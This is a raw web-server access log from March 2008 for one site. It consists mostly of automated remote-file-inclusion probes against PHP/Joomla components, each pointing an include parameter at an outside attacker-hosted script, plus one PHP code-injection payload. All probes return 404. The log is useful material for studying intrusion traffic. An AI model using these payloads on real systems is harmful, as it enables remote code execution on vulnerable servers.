218.150.160.162 - - [17/Mar/2008:05:35:07 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.150.160.162 - - [17/Mar/2008:05:35:07 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:35:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:35:38 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:35:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.caccolas/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:35:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:35:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.caccolas/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:35:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.23.125 - - [17/Mar/2008:05:35:39 -0700] "GET /logs/access_080302.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.36.235.74 - - [17/Mar/2008:05:35:51 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:36:00 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:05:36:02 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:36:03 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:36:03 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:05:36:12 -0700] "GET /logs/access_080215.log//content.php?inc=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:05:36:12 -0700] "GET /logs/access_080215.log//content.php?inc=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:05:36:13 -0700] "GET //content.php?inc=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:05:36:13 -0700] "GET //content.php?inc=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:05:36:13 -0700] "GET /logs//content.php?inc=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:05:36:13 -0700] "GET /logs//content.php?inc=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:36:18 -0700] "GET /logs/access_080120.log/components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:36:21 -0700] "GET /logs/access_080124.log/components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.143 - - [17/Mar/2008:05:36:40 -0700] "GET /logs/access_080225.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.83 - - [17/Mar/2008:05:36:53 -0700] "GET /logs/access_080207.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.41.146 - - [17/Mar/2008:05:37:08 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.41.146 - - [17/Mar/2008:05:37:08 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.41.146 - - [17/Mar/2008:05:37:08 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.24.58 - - [17/Mar/2008:05:37:17 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [17/Mar/2008:05:37:17 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [17/Mar/2008:05:37:17 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:37:21 -0700] "GET /logs/access_080211.log/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:37:21 -0700] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:37:22 -0700] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:37:42 -0700] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:38:01 -0700] "GET /myevent.php?myevent_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:38:01 -0700] "GET /logs/myevent.php?myevent_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:38:10 -0700] "GET /logs/access_080101.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.135.21 - - [17/Mar/2008:05:38:14 -0700] "GET /logs/access_080207.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:05:38:17 -0700] "GET //community/index.php?from_market=Y&pageurl=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.85.198 - - [17/Mar/2008:05:38:18 -0700] "GET /logs/access_080122.log///modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.visitecuador.travel/downloads/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:38:33 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:38:33 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:38:37 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.224 - - [17/Mar/2008:05:38:39 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nedaleko.ru/en/img/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
209.216.249.224 - - [17/Mar/2008:05:38:39 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nedaleko.ru/en/img/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:38:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:38:48 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.29.159 - - [17/Mar/2008:05:38:49 -0700] "GET /logs/access_071201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:39:06 -0700] "GET /logs/access_080111.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:39:09 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:39:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:39:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:39:55 -0700] "GET /logs/access_080207.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:05:40:06 -0700] "GET /logs/access_080124.log//includes/kb_constants.php?module_root_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.80.134 - - [17/Mar/2008:05:40:06 -0700] "GET /logs/classes/core/language.php?rootdir=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
209.62.80.134 - - [17/Mar/2008:05:40:06 -0700] "GET /classes/core/language.php?rootdir=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:05:40:06 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:05:40:06 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:40:13 -0700] "GET /logs/access_080118.log/components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:05:40:23 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.127.65.186 - - [17/Mar/2008:05:40:26 -0700] "GET /logs/access_080119.log/modules/xfsection/modify.php?dir_module=http://svchost25.site.voila.fr/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.127.65.186 - - [17/Mar/2008:05:40:26 -0700] "GET /modules/xfsection/modify.php?dir_module=http://svchost25.site.voila.fr/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.127.65.186 - - [17/Mar/2008:05:40:27 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://svchost25.site.voila.fr/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:40:35 -0700] "GET /logs/access_080215.log/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:40:35 -0700] "GET /logs/access_080215.log/index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:40:35 -0700] "GET /index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:40:35 -0700] "GET /index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:40:35 -0700] "GET /logs/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:40:36 -0700] "GET /logs/index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:40:43 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:40:43 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:40:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:05:41:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:05:41:02 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.6.23.166 - - [17/Mar/2008:05:41:07 -0700] "GET /megumi/?D=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:41:19 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:41:20 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:41:20 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:05:41:34 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [17/Mar/2008:05:41:38 -0700] "GET /logs/access_080228.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [17/Mar/2008:05:41:38 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.102 - - [17/Mar/2008:05:41:48 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [17/Mar/2008:05:41:48 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.23.213 - - [17/Mar/2008:05:41:58 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:05:42:04 -0700] "GET /logs/classes/core/language.php?rootdir=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:05:42:04 -0700] "GET /classes/core/language.php?rootdir=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:42:37 -0700] "GET /logs/access_080119.log/components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
75.127.65.186 - - [17/Mar/2008:05:42:38 -0700] "GET /logs/access_080126.log/modules/xfsection/modify.php?dir_module=http://svchost25.site.voila.fr/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.178.94 - - [17/Mar/2008:05:43:10 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:43:23 -0700] "GET /logs/access_080111.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:43:38 -0700] "GET /logs/access_071220.log/components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:05:43:49 -0700] "GET /logs/access_080225.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:05:43:49 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:05:43:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.22.10.105 - - [17/Mar/2008:05:43:59 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:05:44:27 -0700] "GET /logs/access_080225.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:05:44:27 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:05:44:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.157.210 - - [17/Mar/2008:05:44:33 -0700] "GET /logs/access_080207.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.20 - - [17/Mar/2008:05:44:45 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:45:08 -0700] "GET /logs/access_071214.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
217.172.183.206 - - [17/Mar/2008:05:45:33 -0700] "GET /classes/core/language.php?rootdir=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
217.172.183.206 - - [17/Mar/2008:05:45:33 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:05:45:36 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:45:54 -0700] "GET /logs/access_080201.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
213.193.222.176 - - [17/Mar/2008:05:46:55 -0700] "GET /logs/errors.php?error=http://www.zdravenportal.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.193.222.176 - - [17/Mar/2008:05:46:56 -0700] "GET /errors.php?error=http://www.zdravenportal.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:46:58 -0700] "GET /logs/myevent.php?myevent_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:47:02 -0700] "GET /myevent.php?myevent_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
69.50.214.191 - - [17/Mar/2008:05:47:12 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:47:12 -0700] "GET /logs/myevent.php?myevent_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:47:12 -0700] "GET /myevent.php?myevent_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
